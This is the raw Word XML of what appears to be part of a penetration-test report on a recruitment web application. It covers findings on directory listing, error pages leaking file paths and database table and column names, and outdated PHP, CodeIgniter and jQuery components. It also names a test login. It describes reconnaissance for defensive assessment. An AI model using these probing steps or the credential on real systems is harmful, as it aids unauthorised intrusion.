          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C3836B9" wp14:editId="23984461">
            <wp:extent cx="5943600" cy="1780540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946395" name="Picture 189463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5" name="Picture 18946395" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1780540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D548B51" w14:textId="77777777" w:rsidR="00951011" w:rsidRPr="00ED3244" w:rsidRDefault="00951011" w:rsidP="00951011">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7164E3" w14:textId="77777777" w:rsidR="00951011" w:rsidRDefault="00951011" w:rsidP="00951011">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D35308" w14:textId="77777777" w:rsidR="00A65C07" w:rsidRDefault="00A65C07" w:rsidP="00A65C07">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc94100238"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Directory Listing Enabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="24255DC8" w14:textId="77777777" w:rsidR="00A65C07" w:rsidRPr="00B8524A" w:rsidRDefault="00A65C07" w:rsidP="00A65C07">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C420A05" w14:textId="0C4F8F28" w:rsidR="00482C97" w:rsidRPr="00A57B6F" w:rsidRDefault="00482C97" w:rsidP="00482C97">
      <w:r>
        <w:t xml:space="preserve">Directory browsing is an information gathering attack </w:t>
      </w:r>
      <w:r w:rsidR="002B783E">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leverages an administrative misconfiguration in a web server </w:t>
      </w:r>
      <w:r w:rsidR="002B783E">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allows listing of directory contents. This is not advisable as it presents a potential threat by revealing far too much information. Most web servers are configured out-of-the</w:t>
      </w:r>
      <w:r w:rsidR="00132E76">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>box with directory browsing turned on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EC1EB" w14:textId="037F39D3" w:rsidR="00482C97" w:rsidRDefault="00482C97" w:rsidP="00A65C07">
      <w:r w:rsidRPr="005E7852">
        <w:t>The presence of a directory listing does not always imply that it is a security risk. Any sensitive resources in the web root should be access-controlled in any case and should not be accessible by an unauthorized person who knows or guesses the URL. Even if directory listings are blocked, an attacker can use automated techniques to estimate the location of sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B8F82" w14:textId="65EB3A84" w:rsidR="00A65C07" w:rsidRPr="00F20BEE" w:rsidRDefault="00A65C07" w:rsidP="00A65C07">
      <w:r>
        <w:t xml:space="preserve">Based on the hidden directories documented during the information </w:t>
      </w:r>
      <w:r w:rsidR="00515115">
        <w:t>gathering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phase and the automated scanner detecting this vulnerability, it is confirmed that some directories are accessible by unauthenticated users and may contain sensitive information.</w:t>
      </w:r>
      <w:r w:rsidR="00106FD7" w:rsidRPr="00106FD7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297FFEB" w14:textId="1B517580" w:rsidR="00482C97" w:rsidRPr="00D2255B" w:rsidRDefault="00106FD7" w:rsidP="00D2255B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658292" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F155DCF" wp14:editId="23ACD5EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>343325</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>108701</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1015376" cy="101711"/>
                <wp:effectExtent l="0" t="0" r="13335" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="106" name="Rectangle 106"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1015376" cy="101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782248">
              <v:rect id="Rectangle 106" style="position:absolute;margin-left:27.05pt;margin-top:8.55pt;width:79.95pt;height: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7D5B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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658291" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C4D8713" wp14:editId="0FDDE3CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1194891</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>328860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1565138" cy="168294"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="105" name="Rectangle 105"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1565138" cy="1682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8ADEBC">
              <v:rect id="Rectangle 105" style="position:absolute;margin-left:94.1pt;margin-top:25.9pt;width:123.25pt;height:13.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F97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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A65C07" w:rsidRPr="00F20BEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FFD3814" wp14:editId="605D5CA3">
            <wp:extent cx="5943600" cy="1863725"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1863725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00482C97">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F67C4B" w14:textId="77777777" w:rsidR="006962A5" w:rsidRDefault="006962A5" w:rsidP="006962A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc94100239"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Application Error Disclosure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="360B106E" w14:textId="77777777" w:rsidR="006962A5" w:rsidRPr="00A46C7B" w:rsidRDefault="006962A5" w:rsidP="006962A5">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3DC03" w14:textId="510EA17F" w:rsidR="00E32329" w:rsidRDefault="00E32329" w:rsidP="006962A5">
      <w:r w:rsidRPr="00595FC6">
        <w:t xml:space="preserve">An application error disclosure is an attack where </w:t>
      </w:r>
      <w:r>
        <w:t>the web application reveals information that can be useful for an attacker to construct and plan attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00595FC6">
        <w:t>. The information includes information about the server environment, credentials of API keys</w:t>
      </w:r>
      <w:r w:rsidR="00515115">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00595FC6">
        <w:t xml:space="preserve"> and many more. These leakages can have disastrous effects on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618214DD" w14:textId="1701A857" w:rsidR="006962A5" w:rsidRPr="00B8524A" w:rsidRDefault="006962A5" w:rsidP="006962A5">
      <w:r>
        <w:t>Pages that contain error or warning messages that may disclose sensitive information such as the location of the file where the unhandled exception occurred. Using this sensitive information, an attacker can launch attacks against the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667585F" w14:textId="5B07802E" w:rsidR="006962A5" w:rsidRPr="00B8524A" w:rsidRDefault="006962A5" w:rsidP="006962A5">
      <w:r>
        <w:t xml:space="preserve">Logging in as Employer user (admin123). </w:t>
      </w:r>
      <w:r w:rsidR="001A727E">
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00C327CA">
        <w:t>Recruitment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> page, under Salary Acc, it shows 3 different entries. When the action ‘Pass’ is clicked, there are three options shown, Permanent, Contract</w:t>
      </w:r>
      <w:r w:rsidR="00C327CA">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6188A" w14:textId="179F36B5" w:rsidR="006962A5" w:rsidRDefault="00D066EC" w:rsidP="006962A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658294" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2747158E" wp14:editId="75D72DDD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4210050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>899795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1543050" cy="219075"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="18946423" name="Rectangle 18946423"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="154305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00C51D">
              <v:rect id="Rectangle 18946423" style="position:absolute;margin-left:331.5pt;margin-top:70.85pt;width:121.5pt;height:17.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4D14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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003C0F5F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658293" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65886095" wp14:editId="649F7362">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4536831</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1793994</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="713021" cy="467248"/>
                <wp:effectExtent l="0" t="0" r="11430" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="107" name="Rectangle 107"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="713021" cy="4672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82A17A">
              <v:rect id="Rectangle 107" style="position:absolute;margin-left:357.25pt;margin-top:141.25pt;width:56.15pt;height:36.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810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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006962A5" w:rsidRPr="0043064F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="464CAF67" wp14:editId="06F1D12C">
            <wp:extent cx="5943600" cy="2906395"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18946386" name="Picture 189463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6" name="Picture 18946386" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2906395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D852C7" w14:textId="77777777" w:rsidR="006962A5" w:rsidRDefault="006962A5" w:rsidP="006962A5"/>
    <w:p w14:paraId="33BA7355" w14:textId="77777777" w:rsidR="00E32329" w:rsidRDefault="00E32329">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC84AC" w14:textId="068E06FB" w:rsidR="006962A5" w:rsidRDefault="006962A5" w:rsidP="006962A5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When selecting any of the three options mentioned above, the web application redirects the user to an error page. The error page as shown below displays the different errors which occurred, the filename, file location, and a database error </w:t>
      </w:r>
      <w:r w:rsidR="001A727E">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows the table name for employees and the column names. This information can be used for further attacks against the web application, such as SQL injection using database error information.</w:t>
      </w:r>
      <w:r w:rsidR="00CB179C" w:rsidRPr="00CB179C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA6EF0" w14:textId="55675721" w:rsidR="006962A5" w:rsidRDefault="00CB179C" w:rsidP="006962A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="788662DA" wp14:editId="4914D794">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>180906</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2591518</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1245996" cy="85520"/>
                <wp:effectExtent l="0" t="0" r="11430" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="109" name="Rectangle 109"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1245996" cy="85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BAF180">
              <v:rect id="Rectangle 109" style="position:absolute;margin-left:14.25pt;margin-top:204.05pt;width:98.1pt;height:6.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9702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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658295" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="670B4027" wp14:editId="3506C31F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>180869</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1070240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2085033" cy="92913"/>
                <wp:effectExtent l="0" t="0" r="10795" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="108" name="Rectangle 108"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2085033" cy="9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7B7E5F">
              <v:rect id="Rectangle 108" style="position:absolute;margin-left:14.25pt;margin-top:84.25pt;width:164.2pt;height:7.3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5724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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006962A5" w:rsidRPr="006A1B9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05F234CB" wp14:editId="37DFFEE0">
            <wp:extent cx="5943600" cy="3194685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="18946387" name="Picture 18946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7" name="Picture 18946387" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3194685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="476EA65C" w14:textId="77777777" w:rsidR="006962A5" w:rsidRDefault="006962A5" w:rsidP="006962A5"/>
    <w:p w14:paraId="7AF0E199" w14:textId="5640D48D" w:rsidR="006962A5" w:rsidRDefault="00CB179C" w:rsidP="006962A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658297" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="102714F2" wp14:editId="187C1C87">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>42283</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1306267</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5851103" cy="158567"/>
                <wp:effectExtent l="0" t="0" r="16510" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="110" name="Rectangle 110"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5851103" cy="1585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AD6F0D">
              <v:rect id="Rectangle 110" style="position:absolute;margin-left:3.35pt;margin-top:102.85pt;width:460.7pt;height:12.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1957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LUgg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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006962A5" w:rsidRPr="005D39DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2741BAE2" wp14:editId="1FAB2BF9">
            <wp:extent cx="5943600" cy="1662430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="227" name="Picture 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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1662430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="060BA40B" w14:textId="77777777" w:rsidR="006962A5" w:rsidRDefault="006962A5" w:rsidP="006962A5"/>
    <w:p w14:paraId="489EA4DB" w14:textId="77777777" w:rsidR="00184EA2" w:rsidRDefault="00184EA2">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C0883" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc94100240"/>
      <w:r w:rsidRPr="00AF20F2">
        <w:lastRenderedPageBreak/>
        <w:t>Using Components with Known Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="50AF5079" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRPr="00D11BAA" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AF0559" w14:textId="4463B300" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r>
        <w:t xml:space="preserve">Analyzing the components used by </w:t>
      </w:r>
      <w:r w:rsidR="00B81FA5">
        <w:t>the web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> such as the PHP, CodeIgniter, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14562">
        <w:t xml:space="preserve"> jQuery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by searching for known vulnerabilities through a security vulnerability data source based on its versions and technology. There are currently known vulnerabilities regarding PHP as seen below which attackers can use to exploit the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D2DE8" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="00590063">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE5006E" wp14:editId="6B4E2CF6">
            <wp:extent cx="5943600" cy="1664970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946390" name="Picture 189463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0" name="Picture 18946390" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1664970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886D973" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r>
        <w:t>Moreover, the PHP framework CodeIgniter version is unknown but there are vulnerabilities that still exist as seen in the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7850E525" w14:textId="77777777" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r w:rsidRPr="00A2599E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311FD1A1" wp14:editId="2CB9D57F">
            <wp:extent cx="5943600" cy="2008505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946380" name="Picture 1894638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0" name="Picture 18946380" descr="Graphical user interface, application&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2008505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5273AA83" w14:textId="6D54E5FC" w:rsidR="00FD5BCF" w:rsidRDefault="00FD5BCF" w:rsidP="00FD5BCF">
      <w:r>
        <w:t>However, jQuery version 3.2.1 released on 20</w:t>
      </w:r>
      <w:r w:rsidRPr="0027468D">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> March 2017 </w:t>
      </w:r>
      <w:r w:rsidR="001A727E">
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> publicly recorded multiple CVE vulnerabilities such as CVE-2020-11022 where jQuery’s DOM will execute untrusted code even through sanitization. </w:t>
      </w:r>
    </w:p>
